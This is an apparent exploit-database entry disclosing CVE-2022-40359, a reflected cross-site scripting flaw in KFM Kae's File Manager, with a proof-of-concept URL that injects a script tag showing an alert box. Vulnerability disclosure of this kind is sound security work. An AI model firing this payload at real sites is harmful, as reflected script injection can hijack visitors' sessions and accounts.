# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359
Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php.
Visit PoC URL in browser
https://{URL]/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E